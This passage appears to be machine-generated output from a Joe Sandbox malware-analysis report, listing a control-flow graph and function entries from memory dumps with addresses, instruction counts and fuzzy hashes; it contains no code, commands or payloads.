                        control_flow_graph 1054 7ffd9b8afe82-7ffd9b8afe8f 1055 7ffd9b8afe9a-7ffd9b8aff67 1054->1055 1056 7ffd9b8afe91-7ffd9b8afe99 1054->1056 1061 7ffd9b8aff69-7ffd9b8aff72 1055->1061 1062 7ffd9b8affd3 1055->1062 1056->1055 1061->1062 1064 7ffd9b8aff74-7ffd9b8aff80 1061->1064 1063 7ffd9b8affd5-7ffd9b8afffa 1062->1063 1071 7ffd9b8b0066 1063->1071 1072 7ffd9b8afffc-7ffd9b8b0005 1063->1072 1065 7ffd9b8affb9-7ffd9b8affd1 1064->1065 1066 7ffd9b8aff82-7ffd9b8aff94 1064->1066 1065->1063 1068 7ffd9b8aff98-7ffd9b8affab 1066->1068 1069 7ffd9b8aff96 1066->1069 1068->1068 1070 7ffd9b8affad-7ffd9b8affb5 1068->1070 1069->1068 1070->1065 1074 7ffd9b8b0068-7ffd9b8b008d 1071->1074 1072->1071 1073 7ffd9b8b0007-7ffd9b8b0013 1072->1073 1075 7ffd9b8b0015-7ffd9b8b0027 1073->1075 1076 7ffd9b8b004c-7ffd9b8b0064 1073->1076 1080 7ffd9b8b00fb 1074->1080 1081 7ffd9b8b008f-7ffd9b8b0099 1074->1081 1078 7ffd9b8b002b-7ffd9b8b003e 1075->1078 1079 7ffd9b8b0029 1075->1079 1076->1074 1078->1078 1082 7ffd9b8b0040-7ffd9b8b0048 1078->1082 1079->1078 1084 7ffd9b8b00fd-7ffd9b8b012b 1080->1084 1081->1080 1083 7ffd9b8b009b-7ffd9b8b00a8 1081->1083 1082->1076 1085 7ffd9b8b00aa-7ffd9b8b00bc 1083->1085 1086 7ffd9b8b00e1-7ffd9b8b00f9 1083->1086 1091 7ffd9b8b019b 1084->1091 1092 7ffd9b8b012d-7ffd9b8b0138 1084->1092 1087 7ffd9b8b00c0-7ffd9b8b00d3 1085->1087 1088 7ffd9b8b00be 1085->1088 1086->1084 1087->1087 1090 7ffd9b8b00d5-7ffd9b8b00dd 1087->1090 1088->1087 1090->1086 1093 7ffd9b8b019d-7ffd9b8b0275 1091->1093 1092->1091 1094 7ffd9b8b013a-7ffd9b8b0148 1092->1094 1104 7ffd9b8b027b-7ffd9b8b028a 1093->1104 1095 7ffd9b8b014a-7ffd9b8b015c 1094->1095 1096 7ffd9b8b0181-7ffd9b8b0199 1094->1096 1098 7ffd9b8b0160-7ffd9b8b0173 1095->1098 1099 7ffd9b8b015e 1095->1099 1096->1093 1098->1098 1100 7ffd9b8b0175-7ffd9b8b017d 1098->1100 1099->1098 1100->1096 1105 7ffd9b8b028c 1104->1105 1106 7ffd9b8b0292-7ffd9b8b02f4 call 7ffd9b8b0310 1104->1106 1105->1106 1114 7ffd9b8b02f6 1106->1114 1115 7ffd9b8b02fb-7ffd9b8b030f 1106->1115 1114->1115
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f7c4a5519f0f56068f6f75e921951b2bd5db84308730d366b99edaec6106567
                        • Instruction ID: f729237cddd9a7cc04ff8b89d667749d9c2c18b6d3aeaee5ee0a41027b40f85c
                        • Opcode Fuzzy Hash: 3f7c4a5519f0f56068f6f75e921951b2bd5db84308730d366b99edaec6106567
                        • Instruction Fuzzy Hash: 26E1D530A19A4E8FEBA8DF68C8657F937D1FF58310F04426EE84DC7295DE3499458B81
                        Function 00007FFD9B8A872C Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94c1664a621586959783b6d63c21fb15a9f2d1c98b5932f8fb174e5ce4f3f5f2
                        • Instruction ID: 74920bbb8f8aafc358bc9b89c5a31534fd8e2169237bbeebf25b71afe4e35939
                        • Opcode Fuzzy Hash: 94c1664a621586959783b6d63c21fb15a9f2d1c98b5932f8fb174e5ce4f3f5f2
                        • Instruction Fuzzy Hash: 3D418370A4592D8FEBA5EB18C894BE8B3B1FB59305F5004EA940DE3295DB35AEC0CF01
                        Function 00007FFD9B8B0AE5 Relevance: 1.7, APIs: 1, Instructions: 249COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID: FullImageNameProcessQuery
                        • String ID:
                        • API String ID: 3578328331-0
                        • Opcode ID: 3da3f0496aa45811861fa5c0a7fd14c9c8401ff3af78bc12afc0470d793e091a
                        • Instruction ID: 3408b5a29d0fcb0704acaaea230993273094bb7a88d5ee94a31db4d34108f223
                        • Opcode Fuzzy Hash: 3da3f0496aa45811861fa5c0a7fd14c9c8401ff3af78bc12afc0470d793e091a
                        • Instruction Fuzzy Hash: 9D819030618A8D8FDB68DF28C8657F937E1FB59311F14427EE84EC7292CB74A9458B81

                        Non-executed Functions

                        Function 00007FFD9B8AF0D6 Relevance: .5, Instructions: 471COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c84baf4137046acbd60106fc59a7a705c86d798b0ab901239ede820b75d5847f
                        • Instruction ID: 3ea5db5401c0cde3cd0945e4ea681bfa97f6d41725feb6275ee7b977cbbbef65
                        • Opcode Fuzzy Hash: c84baf4137046acbd60106fc59a7a705c86d798b0ab901239ede820b75d5847f
                        • Instruction Fuzzy Hash: 56F1B830A09A4E8FEBA8DF68C8657F937E1FF58310F04426EE84DC7695DB3499418B81

                        Executed Functions

                        Function 00007FFD9BAB2010 Relevance: 15.3, Strings: 11, Instructions: 1583COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 738053705a3bfb993e26a6991284fa247a1f53ab1ebc50352ebd6bfa6a7f36de
                        • Instruction ID: e4952d0b8bdea702928f9d02280c760fa176e2c7d8d84ba875d1c792e772bb48
                        • Opcode Fuzzy Hash: 738053705a3bfb993e26a6991284fa247a1f53ab1ebc50352ebd6bfa6a7f36de
                        • Instruction Fuzzy Hash: 72E2D570E1962D8FDBA8DF18C894BA9B7B1FF59301F5041EAD01DE7295CA74AA81CF40
                        Function 00007FFD9BAC093E Relevance: 1.1, Instructions: 1107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 882edd8b7f7df96e621a72e5aa0cbcb71aace05949b3d656e53ba0c37e832a30
                        • Instruction ID: 127a1d6da3f16df274375a2fbc1cc8a4361b5980dba209fb15940c6626e363fc
                        • Opcode Fuzzy Hash: 882edd8b7f7df96e621a72e5aa0cbcb71aace05949b3d656e53ba0c37e832a30
                        • Instruction Fuzzy Hash: 3672D620F1984E4BE7A8FBBC44757B962D2EF98354F0545B8E11EC32E7CDA8AD414B42
                        Function 00007FFD9BAC0974 Relevance: .9, Instructions: 912COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fcd7e2c2be51d0d5e0b1172904c19aa5c94caf3b61c9327fd72679ed03d6d35
                        • Instruction ID: 5fee0972b35c79bfb4d5928fec1591e9ca7195367a42c9905201a565e27894b2
                        • Opcode Fuzzy Hash: 8fcd7e2c2be51d0d5e0b1172904c19aa5c94caf3b61c9327fd72679ed03d6d35
                        • Instruction Fuzzy Hash: E352B110F1984A4BE7ACFBBC44367B962D2EFA8254F1541B8E12EC32E7DD58AD424742
                        Function 00007FFD9BAC4CEB Relevance: .8, Instructions: 837COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 873d5ecc59378c3159b610f5ab7a1cbf1cc92196e8e70714fe6cb69bc5f778ac
                        • Instruction ID: 65e07af4565640116d5d44ecb94a3bfb38e9d053d9d541f480300d84b416626f
                        • Opcode Fuzzy Hash: 873d5ecc59378c3159b610f5ab7a1cbf1cc92196e8e70714fe6cb69bc5f778ac
                        • Instruction Fuzzy Hash: BF420830A0D60D8FDBA8EB58C865AB877E1FF55310F1101BDE05EC72A2DE65AD46CB81
                        Function 00007FFD9BAB0600 Relevance: 7.0, Strings: 5, Instructions: 771COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$"$-$[${
                        • API String ID: 0-3019564589
                        • Opcode ID: 14efb9a984a02e44bec068cd74f49a55b4aa88132725008984e92da3a7064e79
                        • Instruction ID: 0dc1ee57b7cd8c8d118e92e01c20cdd5e7d1c1e115d683447cfb25cf8b8d5188
                        • Opcode Fuzzy Hash: 14efb9a984a02e44bec068cd74f49a55b4aa88132725008984e92da3a7064e79
                        • Instruction Fuzzy Hash: 1E62E970E0966D8FDBA4EF68C894BA8B7F1FF58301F5041A9D05DE7295CA34AA81CF40
                        Function 00007FFD9BAB8E2C Relevance: 2.8, Strings: 1, Instructions: 1534COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: #S}
                        • API String ID: 0-2721051066
                        • Opcode ID: 26418ddcf3f890820382d3521b81a6dca5ee147239d0d5cddd72d16e3a2f6adb
                        • Instruction ID: 4439b335c451c21387820fc9b5db61ca3dc76891ad76a8f31ff98834575ee0bd
                        • Opcode Fuzzy Hash: 26418ddcf3f890820382d3521b81a6dca5ee147239d0d5cddd72d16e3a2f6adb
                        • Instruction Fuzzy Hash: 60D2A370A0992D8FDBA4EF58C895BA8B7B1FF59315F1001E9D01DE72A5CA74AE81CF40
                        Function 00007FFD9BABB945 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: lM_H
                        • API String ID: 0-1842479373
                        • Opcode ID: 673665ba57eea859d1617dee36eb82e505fff5c4b4770e6ca97bd9b2e8424ace
                        • Instruction ID: d2826d5a05a3931282a22c46c60a2f341317baf0a739cdbdeb5fa54e2c4287c0
                        • Opcode Fuzzy Hash: 673665ba57eea859d1617dee36eb82e505fff5c4b4770e6ca97bd9b2e8424ace
                        • Instruction Fuzzy Hash: FB416571F1E92D4FEB64DB9CA8626BC73D2EF94710F960179E02EC32A2DD646D024B40
                        Function 00007FFD9BABFE2A Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: H
                        • API String ID: 0-2852464175
                        • Opcode ID: ae6a48ea2accfbd3fc39933ed3db2b057ea4b8d40cf0d8230dd684c7089af82a
                        • Instruction ID: adfbc57ac50609125d13a6e292007cc2d03977539b86fb3b39ce17a1ceb1fa38
                        • Opcode Fuzzy Hash: ae6a48ea2accfbd3fc39933ed3db2b057ea4b8d40cf0d8230dd684c7089af82a
                        • Instruction Fuzzy Hash: 57216A22F1ED9E0FE76C936C08A45B963C2EF95254F5842BAE01EC71DBDC5AA9024380
                        Function 00007FFD9BABDE1C Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 851ae5d970d0f17d0d9965edcd77f902c5f4a628c41a143ece80d60c6bdd0193
                        • Instruction ID: 745593f5f9d6a263ba1b26b67ff3cba54aeb7e2e6f5aab8dcd8f06dafbfae609
                        • Opcode Fuzzy Hash: 851ae5d970d0f17d0d9965edcd77f902c5f4a628c41a143ece80d60c6bdd0193
                        • Instruction Fuzzy Hash: BD217C31E1A51D9FEB58DF98D8A19EDBBB1FF58300F0041B9E029D7296DA346A01CF00
                        Function 00007FFD9BAC497C Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 57324e5ff198e1a4dfc6e09f52dfbf00b6b767eb03037b83b9cbcfc5e6268796
                        • Instruction ID: 352f54f9a4267ea3576a08ebc46621f2dd224e7841e8555d4aaeec8ca4e24c3e
                        • Opcode Fuzzy Hash: 57324e5ff198e1a4dfc6e09f52dfbf00b6b767eb03037b83b9cbcfc5e6268796
                        • Instruction Fuzzy Hash: 16214731E1A90D9BDB68EB98C8A19FDB7B1FF58304F104179E019E32A6CE752942CB04
                        Function 00007FFD9BABD6DC Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: fa3e973b4cc1e1f58bb4044ae153f513a9693c854df3c21230a0be21f8124816
                        • Instruction ID: 879fec04dc77f12301c5bada87573cb4486d3f3207e07487e083ef27594494d4
                        • Opcode Fuzzy Hash: fa3e973b4cc1e1f58bb4044ae153f513a9693c854df3c21230a0be21f8124816
                        • Instruction Fuzzy Hash: 8E11B131E1A50D9FEB18CB94D4649ECB7B0EF58300F0041BEE069D2292DA342942CF40
                        Function 00007FFD9BAC78D8 Relevance: .5, Instructions: 460COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c90da5c8a25f13fba09f4f66136adb87e0ce7dea111c3f0c7a4de6b2b90525b2
                        • Instruction ID: 2525f4fbff2328d7ac7c1717a99e6bb8059e9d34f01b4d3c2ea2ee7792750a52
                        • Opcode Fuzzy Hash: c90da5c8a25f13fba09f4f66136adb87e0ce7dea111c3f0c7a4de6b2b90525b2
                        • Instruction Fuzzy Hash: F202C370E1895D9FDB94EF68C895FA9B7B1FF58305F1042A5E40CE72A6CA34A980CF41
                        Function 00007FFD9BABA88D Relevance: .4, Instructions: 399COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 441e20a6ee33868c1e861067d974d2d16ec51573f757db713e54f5eb3ed02c5a
                        • Instruction ID: 7af2f48bfbd602e59c0b4aa815564863dec45a9d527fc1e0eb94b1949aef0360
                        • Opcode Fuzzy Hash: 441e20a6ee33868c1e861067d974d2d16ec51573f757db713e54f5eb3ed02c5a
                        • Instruction Fuzzy Hash: 7BD13B30A09A5D8FDB94EF58C8A4BE8B7F1FF59304F1101AAE41DD7296CB35A941CB40
                        Function 00007FFD9BAB5A0D Relevance: .4, Instructions: 390COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d81ea87d4f7b4e2a32a2bab9fd6b2e54c3f511881a5c7c50ef7fe6d5a513133
                        • Instruction ID: 93467d621100798c45848bd6e20d0c6fa95594de9013ee9ff90b3bc288d3a1a6
                        • Opcode Fuzzy Hash: 1d81ea87d4f7b4e2a32a2bab9fd6b2e54c3f511881a5c7c50ef7fe6d5a513133
                        • Instruction Fuzzy Hash: 36D12A30A09A5D8FDB94EF58C8A4BA9B7F1FF59304F1101AAE41DE7296CB35A941CB40
                        Function 00007FFD9BABDFBE Relevance: .4, Instructions: 386COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1343dac2936407b269c840e9bfc78f38ce45543ad6ef3b3f1aebb1dbd82c86b
                        • Instruction ID: 916be5014bceeb69137673357689e338c605b0e8e322b5a48cd96113ef1866c5
                        • Opcode Fuzzy Hash: d1343dac2936407b269c840e9bfc78f38ce45543ad6ef3b3f1aebb1dbd82c86b
                        • Instruction Fuzzy Hash: C3B1A930B2D66E0BF76C9B6894A15B473D0FB58308F250A7DD4EBC3597D86CA9438B81
                        Function 00007FFD9BAC53EE Relevance: .4, Instructions: 383COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d0de6fdbca2e60b9bf58e25a4ba16b59fb9fc4b329145562527580567a58563
                        • Instruction ID: 0e410b425042981b84934924a908fa9e8e8a0a6188d4f46c30a8c4a0f8b59bbf
                        • Opcode Fuzzy Hash: 8d0de6fdbca2e60b9bf58e25a4ba16b59fb9fc4b329145562527580567a58563
                        • Instruction Fuzzy Hash: 95B18830B2D65A4BF32CAB68D8A21B473C1FB45318F29067DE4DBC3597D96CA9438781
                        Function 00007FFD9BAB18FC Relevance: .4, Instructions: 367COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0795f74ffcfe448d880f2e8f10617cbcfcc304d633bcac77be8818afdfcb77a
                        • Instruction ID: 6ce51a049613019b7e45f7f912a3e48de52e3fdbd361499ad9d92f221adcb60e
                        • Opcode Fuzzy Hash: c0795f74ffcfe448d880f2e8f10617cbcfcc304d633bcac77be8818afdfcb77a
                        • Instruction Fuzzy Hash: 2ED13A71E2965D8FDBA8EF58D8A4BACB7A1FF68304F0041B9D01D972D2DA746980CF40
                        Function 00007FFD9BAC13A5 Relevance: .3, Instructions: 346COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d2e4e11ccafba6b2ceffc60b807a75d128eb01a1d8aede3eb23b6e777eb4b1a
                        • Instruction ID: 737aed701136edb75e475e5553fa4d27a84fc1b7a533971276434f5bf0938d0e
                        • Opcode Fuzzy Hash: 9d2e4e11ccafba6b2ceffc60b807a75d128eb01a1d8aede3eb23b6e777eb4b1a
                        • Instruction Fuzzy Hash: C9C16034B0A51E4BEBB4EB68C4A1B7473A2FF65344F454574D40ED32E2CEB9AE818B41
                        Function 00007FFD9BABEB76 Relevance: .3, Instructions: 333COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45a5fec11678b139adc873ad41d2c7017ab9dffa41e8f6b263c265bbfce90cab
                        • Instruction ID: 277946d4b0cd91b60696027f84417d2327825e26587d02c60b42158baa1d1b36
                        • Opcode Fuzzy Hash: 45a5fec11678b139adc873ad41d2c7017ab9dffa41e8f6b263c265bbfce90cab
                        • Instruction Fuzzy Hash: 97C17D30E0956D9FDB5DCBA8C4A46BCB7A0FF58304F2045BDD06AD7692CA786A42CF41
                        Function 00007FFD9BAB3530 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bfceeec017e9adfc2ca9ea90ed6ee6841c068a70f62dbf7832382c625cee8fcf
                        • Instruction ID: 07b96f695f22bc9c250d2e45a489e1c6400c71921dfd7748aeed285b2775e393
                        • Opcode Fuzzy Hash: bfceeec017e9adfc2ca9ea90ed6ee6841c068a70f62dbf7832382c625cee8fcf
                        • Instruction Fuzzy Hash: 16C14870E1A66D8FDB68DB98C860ABDB7F1FF19304F10017AD019A32A1CB796981CF41
                        Function 00007FFD9BAB18EA Relevance: .3, Instructions: 308COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3dc7b1f14486469b8fc9a811f3c81e8dd1b653ca992bc89474d693b62eb56155
                        • Instruction ID: 8b4ad3e3a417b828ed3ebbcfdef5374ec546b15b81f458ce8c487ac3a631f409
                        • Opcode Fuzzy Hash: 3dc7b1f14486469b8fc9a811f3c81e8dd1b653ca992bc89474d693b62eb56155
                        • Instruction Fuzzy Hash: 6DB14F71A29A5D8FDBA8EF58D864BA8B7A1FF64304F0401B9D01DD72E6DE746980CB01
                        Function 00007FFD9BABDA15 Relevance: .3, Instructions: 306COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96c8ad550acb07bc0cd4213e2588a67ca7ea0d856d74db5001268be6567bcde8
                        • Instruction ID: bc0b9ba552ecd7b6c4b9aa37270b9cd9443ffe2eb3367b5eb6ec1831a9497c96
                        • Opcode Fuzzy Hash: 96c8ad550acb07bc0cd4213e2588a67ca7ea0d856d74db5001268be6567bcde8
                        • Instruction Fuzzy Hash: 6BB1D130709B494FE769DB68C0A06A6B7E1FF59300F55067DC09AC7AA6DAB8B9418B40
                        Function 00007FFD9BAB1900 Relevance: .3, Instructions: 297COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 200f33a9e39e649aec867904fc6cda8a086e73ce3e975827c45101017bb8f475
                        • Instruction ID: 9752622d4850e20004627524e82b6c7d9ef59f1037b0de5de6e147ebf4bc7e40
                        • Opcode Fuzzy Hash: 200f33a9e39e649aec867904fc6cda8a086e73ce3e975827c45101017bb8f475
                        • Instruction Fuzzy Hash: D7B14071A29A5D8FDBA8EF58D864BA8B7A1FF64304F0401B9D01DD72D6DE746980CF01
                        Function 00007FFD9BAC4585 Relevance: .3, Instructions: 296COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7f0f523e20c108f56bcab22558a65fb8f685fc0a28d80c3a8c196170a55efd5
                        • Instruction ID: a29cbd8af4be0654ace708c554ee23db93e8d052873a891b3125f9890ae4f124
                        • Opcode Fuzzy Hash: e7f0f523e20c108f56bcab22558a65fb8f685fc0a28d80c3a8c196170a55efd5
                        • Instruction Fuzzy Hash: E0B1E330B09B4A4FE768EB9980A16B6B7E1FF54300F55057DC08BC7AB6DE78B9418748
